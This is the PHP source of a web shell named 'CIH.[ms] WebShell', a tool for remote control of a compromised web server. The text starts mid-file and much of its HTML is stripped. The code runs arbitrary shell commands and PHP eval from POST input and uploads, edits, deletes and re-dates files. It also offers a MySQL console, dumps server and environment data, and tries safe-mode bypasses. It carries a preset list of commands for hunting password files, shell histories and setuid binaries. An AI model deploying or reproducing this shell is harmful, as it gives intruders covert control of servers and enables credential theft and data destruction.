'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd', 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an', ); # you don't really need to edit it (; $f = array("SHELL" => "shell","EVAL" => "eval", "MySql Suite" => "mysql", "Server Information" => "server", "Env Informaion" => "envinfo", "PHPinfo" => "phpinfo", "Shell delete" => "delete"); $ver = '0.99.1 [ beta {fix} ]'; # ok, let's start # ^^ session_start(); define("start",atime()); if(isset($_POST['eval'])){error_reporting(E_ALL&~E_NOTICE);}elseif($errors){error_reporting(E_ALL&~E_NOTICE);}else{error_reporting(0);} ini_set('max_execution_time',0); set_magic_quotes_runtime(0); set_time_limit(0); if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS; $_GET= &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if (get_magic_quotes_gpc()){foreach ($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}foreach ($_SERVER as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_ENV as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_FILES as $key=>$value){$_SERVER[$key] = stripslashes($value);}} if ($auth == 0) {$_SESSION['logged'] = true;} $safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'off';} else {$safe_mode = 'On';} $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "win"; else $os = "nix"; if(empty($dir)){ $opsy = getenv('OS');if(empty($opsy)){ $opsy = php_uname(); } if(empty($opsy)){ $opsy ="-"; $os = "nix"; } else { if(eregi("^win",$opsy)) { $os = "win"; }else { $os = "nix"; }}} if($os == "nix"){$pwd = exec("pwd");} elseif($os == "win"){$pwd = exec("cd");} if(empty($pwd)) {$pwd = getcwd();} # functions function atime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);} function fperms($file) {$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';}elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} function conv_size($size){ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}else {$size = $size . " B";}return $size;} function fileread($opfile) {$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} while(!feof($fh)) {$line = fgets($fh); echo htmlspecialchars($line);}} function fileread2($opfile,$stringnum) { $fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} echo ''; if ($stringnum){ $i=1; while(!feof($fh)) { $line = fgets($fh); echo ''; $i++; }} else { while(!feof($fh)) { $line = fgets($fh); echo ''; } } echo '
'.$i.''.htmlspecialchars($line).'
'.htmlspecialchars($line).'

'; } function safq($query) { $arr = array();$res = mysql_query($query); if (mysql_num_rows($res) > 0) {$x=0;while($row = mysql_fetch_row($res)){foreach($row as $i => $value) {$column = mysql_field_name($res,$i);$data["$column"] = $value;$arr[$x] = $data;}$x++;}}return $arr;} function cmd_exec($cmd2) { if (isset($_POST['cmd'])) {$cmd=$_POST['cmd'];} else {$cmd = $cmd2;} $result = ''; if(isset($_POST['cmdir'])){chdir($_POST['cmdir']);} if(function_exists('system')){ob_start();system($cmd);$result = ob_get_contents();ob_end_clean();} elseif(function_exists('exec')){exec($cmd,$result);$result = join("\n",$result);} elseif(function_exists('shell_exec')){$result = shell_exec($cmd);} elseif(function_exists('passthru')){ob_start();passthru($cmd);$result = ob_get_contents();ob_end_clean();} elseif(is_resource($f = popen($cmd,"r"))){$result = "";while(!feof($f)) { $result .= fread($f,1024); }pclose($f);} echo $result; } function code_eval() {if (isset($_POST['eval'])){echo "\n result is:

";eval($_POST['eval']);}} function error($text, $ver) { echo '

error occured:

'; do_footer($ver); die(); } function notice($text) { echo "
$text
"; } function do_header($f, $auth, $os, $path) { echo ''; if (isset($_POST['cmd']) || isset($_POST['alias'])) {echo ''; } else{echo'';} echo' CIH.[ms] WebShell
'; echo ""; foreach($f as $k=>$v) { echo " "; } if($auth){echo "";} $disfun = ini_get('disable_functions'); $safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'Off';} else {$safe_mode = 'On';} $mysql_try = function_exists('mysql_connect'); if($mysql_try){ $mysql = 'On';} else {$mysql = 'Off';} $pg_try = function_exists('pg_connect'); if($pg_try){$pg = 'On';}else{$pg = 'Off';} $mssql_try = function_exists('mssql_connect'); if($mssql_try){$mssql = 'On';}else{$mssql = 'Off';} $ora_try = function_exists('ocilogon'); if($ora_try){$ora = 'On';}else{$ora = 'Off';} $curl_try = function_exists('curl_version'); if($curl_try) {$curl = 'On';} else {$curl = 'Off';} $perms = fperms($path); echo '
cihshell on '.$_SERVER['HTTP_HOST'].'
'.$perms.' | OS: '.php_uname().' | safe mode: '.$safe_mode.' | cURL: '.$curl.' | MySQL: '.$mysql.' | MSSQL: '.$mssql.' | PostgreSQL: '.$pg.' | Oracle: '.$ora.' | PHP: '.phpversion().'
 
'; if (!empty($disfun)){ echo '
disabled functions: '.$disfun.'
';} } function do_footer($ver) { echo '
'.round(atime()-start,5).' ©  version : '.$ver.'
'; } # end of functions # if (!empty($_POST['login']) && !empty($_POST['password'])){ if ($_POST['login'] == $login && $_POST['password'] == $password){ $_SESSION['logged'] = true;} else {echo ' login
login:   password:  
incorrect login or password
'; die();}} if (isset ($_POST['do']) && $_POST['do']=='logout') { unset($_SESSION['logged']); } if ($_SESSION['logged'] == true){ if (isset($_POST['do']) && $_POST['do']=='phpinfo'){echo'
'; phpinfo();echo'
';die();} if (isset($_POST['fdo']) && isset($_POST['ffile'])){ $ffile = $_POST['ffile']; switch($_POST['fdo']){ case 'download': $fl = $_POST['filename'];header("Content-type: application/x-octet-stream");header("Content-disposition: attachment; filename=".$fl.";");readfile($ffile);die();break; case 'preview': include($_POST['ffile']);die(); break; }} if(isset($_POST['f_file'])) { if ($_POST['f_file'] == "..") { $slashpos = strpos($_POST['f_path'], strrchr($_POST['f_path'], "/")); $path = substr($_POST['f_path'], 0, $slashpos); } else {$path = $_POST['f_path']."/".$_POST['f_file'];} } elseif(isset($_POST['path'])) {$path = $_POST['path'];} else {$path = $pwd;} if(isset($_POST['restore'])){$path = $pwd;} $path = str_replace("\\", "/", $path);$path = str_replace("'", "", $path); do_header($f, $auth, $os, $path); echo '
'; # Safe-mode # working if (isset($_POST['safe_mode'])){ echo "
Try to read file(include):
 
 
Try to read file(include):
: database: login: password:
 
 
"; do_footer($ver); die(); } # Safe_Mode functions if (isset($_POST['sm_inc'])) { echo "


"; do_footer($version); die();} if(isset($_POST['sm_mysql'])) { echo "


"; do_footer($version);die();} if ($safe_mode == "On" && !isset($_POST['safe_mode'])) { notice('
safe_mode is On.
'); } if (isset($_POST['fileact'])){switch($_POST['fileact']){ case 'New File': $cdir = $_POST['curdir']; echo "

"; do_footer($ver); die();break; case 'New Dir': $curdir = $_POST['curdir']; echo "

"; do_footer($ver);die();break; case 'Upload': if (isset($_FILES['userfile'])) { $file = $_FILES['userfile']; $curdir = $_POST['path']; if(isset($_POST['newfilech']) && !empty($_POST['newfile'])) {$nfn=$_POST['newfile'];} else { $nfn = $file['name']; } if($file['error']!=0) error($file['error']); else{copy($file['tmp_name'], $curdir.'/'.$nfn);if(!file_exists($curdir.'/'.$file['name']))error("Upload failed. (Can't copy temp file ".$file['tmp_name']." into current directory)", $ver);else{notice("File ".$nfn." was uploaded successfuly..");}}} echo "
Upload from your computer:


New name :
 
 
";do_footer($ver);die();break; }} # File Manager : File actions if(isset($_POST['newname'])) // rename {rename($_POST['ffile'], $_POST['newname']);if(!file_exists($_POST['newname'])){error('Could not rename '); }notice("File was successfuly renamed to  ".$_POST['newname']."...");} if(isset($_POST['newpath'])) //copy {copy($_POST['ffile'], $_POST['newpath']);if(!file_exists($_POST['newpath'])){error('Could not copy file'); }echo "
File was successfuly copied to  ".$_POST['newpath']."...
";} if(isset($_POST['chmod'])) // chmod {$a = chmod($_POST['ffile'], $_POST['chmod']);if(!$a){error('Could not change permissions :o(', $ver);}echo "
We hope that permissions for file were successfuly changed to  ".$_POST['chmod']." ^^
";} if(isset($_POST['touch'])) // touch {$dt = strtotime($_POST['touch']); if(!touch($_POST['ffile'], $dt)){ error('Could not change touch time...', $ver);} echo "
We hope that touch for file were successfuly changed to  ".$_POST['touch']." ^^
";} if (isset($_POST['ffile']) && isset($_POST['wrcont'])){ // write into file $wrpath = $_POST['ffile']; $wrcont = $_POST['wrcont'];$fh = fopen($wrpath, 'w');if ($fh){fwrite($fh, $wrcont);fclose($fh); }else {error('Couldn\'t write to file..');}echo "
File $wrpath   was successfuly modified
";} if (isset($_POST['nfname']) && isset($_POST['curdir']) && isset($_POST['wrcont'])) // new file {$file1 = $_POST['curdir']."/".$_POST['nfname'];$fh = fopen($file1, 'w');$r = fwrite($fh, $_POST['wrcont']);fclose($fh);if (!file_exists($file1)){error('Could not create a file..');} else {notice("File was successfuly created");}} if (isset($_POST['dirname']) && isset($_POST['curdir'])) // new directory {$curdir = $_POST['curdir']; mkdir($curdir.'/'.$_POST['dirname']);if(file_exists($curdir.'/'.$_POST['dirname'])){notice($curdir.'/'.$_POST['dirname']." was successfuly created.");}else{error('An error occured while creating dir', $ver);} } # File Manager : Directory actions if (isset($_POST['ddo']) && isset($_POST['dirr'])){ switch($_POST['ddo']){ case 'rename': echo"
to

"; do_footer($ver);die();break; case 'delete': rmdir($_POST['dirr']);if(file_exists($_POST['dirr'])){error('Could not delete directory');}notice($_POST['dirr']." was successfuly deleted.");do_footer($version);break;}} if (isset($_POST['fdo']) && isset($_POST['ffile']) && $_POST['fdo']=='delete'){ unlink($_POST['ffile']);if(file_exists($_POST['ffile'])){error('Could not delete file');}notice("".$_POST['ffile']." was successfuly deleted.");break; }if(isset($_POST['diract'])) {$path = $_POST['cmdir']; $perms = fperms($_POST['cmdir']); echo"
File actions
dir:$path  |   permissions: $perms   
      >
      >


 
";do_footer($ver);die();} # switch $do # if (isset($_REQUEST['do'])) { switch ($_REQUEST['do']){ case 'mysql': if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhost = 'localhost';}if (isset($_POST['mysqlw_db'])){$dbname = $_POST['mysqlw_db'];} else {$dbname = 'dbname';}if (isset($_POST['mysqlw_login'])){$dblogin = $_POST['mysqlw_login'];}else {$dblogin = 'dblogin';}if (isset($_POST['mysqlw_passw'])){$dbpass = $_POST['mysqlw_passw'];}else {$dbpass = 'dbpassword';}if (isset($_POST['mysqlw_port'])){$dbport = $_POST['mysqlw_port'];} else {$dbport = '3306';}if (!empty($_POST['sql'])){echo '
';$sqlq = $_POST['sql'];$db = mysql_connect($dbhost.':'.$dbport,$dblogin,$dbpass);if($db) {if(!empty($_POST['mysqlw_db'])) { mysql_select_db($_POST['mysqlw_db'],$db); }$queries = explode(';',$sqlq);foreach($queries as $number=>$query) { $number++;$r = safq($query); $error = mysql_error($db);if($error == 'Query was empty'){ break;} echo "
query # ".$number.":".htmlspecialchars($query)."
"; if ($error){ notice("Error : ".$error.""); } else {if(is_array($r)){echo ''; if(is_array($r[0])){echo "";foreach($r[0] as $n=>$v){echo "";}echo '';}foreach($r as $a){echo ""; if(is_array($a)){foreach($a as $n=>$v){echo "";}}else{echo "";}echo '';}echo '
$n
$v$a
';}else{echo $r;}if(($rows = mysql_affected_rows($db))>=0) { echo "
affected rows : ".$rows."
"; } }} mysql_close($db);}else {notice('Error: Could not connect to database..');} echo '
'; } echo "


"; do_footer($ver); die(); break; case 'server': echo '';foreach($_SERVER as $k=>$v) {echo "";}echo '
$k$v
';do_footer($ver); die();break; case 'envinfo': echo '';foreach($_ENV as $k=>$v) {echo "";}echo '
$k$v

';do_footer($ver);die();break; case 'delete': if(unlink(substr(strrchr($_SERVER['PHP_SELF'],"/"),1))==true){echo "
cihshell has been deleted successfully..bye-bye ):


"; do_footer($ver);}else{error('Unable to delete shell', $ver);} die();break; case 'eval': echo "

"; if (isset($_POST['eval'])){ echo "
";code_eval();echo "

";} do_footer($ver);die(); break; case 'shell': echo " ";echo "
";echo"


";do_footer($ver); die();break; case 'cihshell':echo "
Coded by Berkut.

© 2007
Fixed by DCRM.

© 2008


CIH.[ms] WebShell v.$ver


It has so many strong points that it is impossible to write them here (:
";do_footer($ver); die();break; default: error('There is no such function',$ver); break;}} # file actions if(is_file($path)) {$perms = fperms($path); $size = filesize($path."/".$file); $size = conv_size($size); $size_fix = conv_size(filesize($path)); $pp = $_POST['f_path'];$ppp = $_POST['f_file']; echo "
File actions
file: $path  |   permissions: $perms   |   size: $size_fix  |   Create time: ".date("d.m.Y H:i:s",filectime($path))."  |  Modify time: ".date("d.m.Y H:i:s",filemtime($path))."
"; if (isset($_POST['fdo']) && isset($_POST['ffile'])){ $ffile = $_POST['ffile']; switch($_POST['fdo']){ case 'view': fileread2($ffile, $stringnum); break; case 'view in HEX': $fi=fopen($path,"rb"); if ($fi) {$str = fread($fi,filesize($path));$n=0;$a0="00000000
";$a1="";$a2=""; for ($i=0; $i";$a1.="
";$a2.="
";}}echo "";echo"
$a0$a1$a2
"; }break; case 'edit': echo "
"; break; case 'chmod': echo"
for

";break; case 'touch': echo"
for

";break; case 'rename': echo"
to

";break; case 'copy': echo"
to

";break; }} else { $fh = fopen($path, 'r'); if (!$fh){error('Could not open file',$ver);}echo '';if ($stringnum){$i=1;while(!feof($fh) & $i<=30) {$line = fgets($fh); echo ''; $i++;}}else {while(!feof($fh) & $i<=30) {$line = fgets($fh); echo ''; }}echo '
'.$i.''.htmlspecialchars($line).'
'.htmlspecialchars($line).'
';} echo '
';do_footer($ver);die();} elseif (is_dir($path)) { $dirs=array(); $files=array(); $dir=opendir($path); while (($file=readdir($dir))!==false) { if ($file=="." || $file=="..") continue; if (is_dir("$path/$file")) {$dirs[]=$file;} else {$files[]=$file;}}closedir($dir); } else {error('it isn\'t a directory', $ver);} if (!$dir){error('An error occured while opening directory '.$path, $ver);} sort($dirs); sort($files); echo ""; echo "";echo "";echo ""; for ($i=0; $i";} for ($i=0; $i array("php","phtml","php3","php4","inc"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), "code"=>array("tcl","h","c","cpp", "pl", "cgi"), "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "sess"=>array("sess"), "dwnld"=>array("exe","com","pif","src","lnk","zip","rar") ); $filename = $files[$i]; $ext = explode(".",$filename);$c = count($ext)-1;$ext = $ext[$c];$ext = strtolower($ext);$rft = "";foreach($filetypes as $key=>$value){if (in_array($ext,$value)) {$ico = $key; break;} } if($ico==''){$ico = 'none';}} $wtf = '/'.$files[$i];if ($wtf == $_SERVER['SCRIPT_NAME']) {echo"";} else { echo""; } }echo '
"; # drives if ($os == "win") { echo "
";echo "";for($d='c';$d<='z';$d++){if(is_dir($d.":/"))echo ""; }echo "
";}echo "
"; echo "|||";echo "
"; echo "
 namesizelast modifiedpermissions
[$ico]$size$last_mod$perms
[shell]$size$last_mod$perms
[$ico]$size$last_mod$perms
 
';do_footer($ver);} else {echo ' login
login:  password:  
';} ?>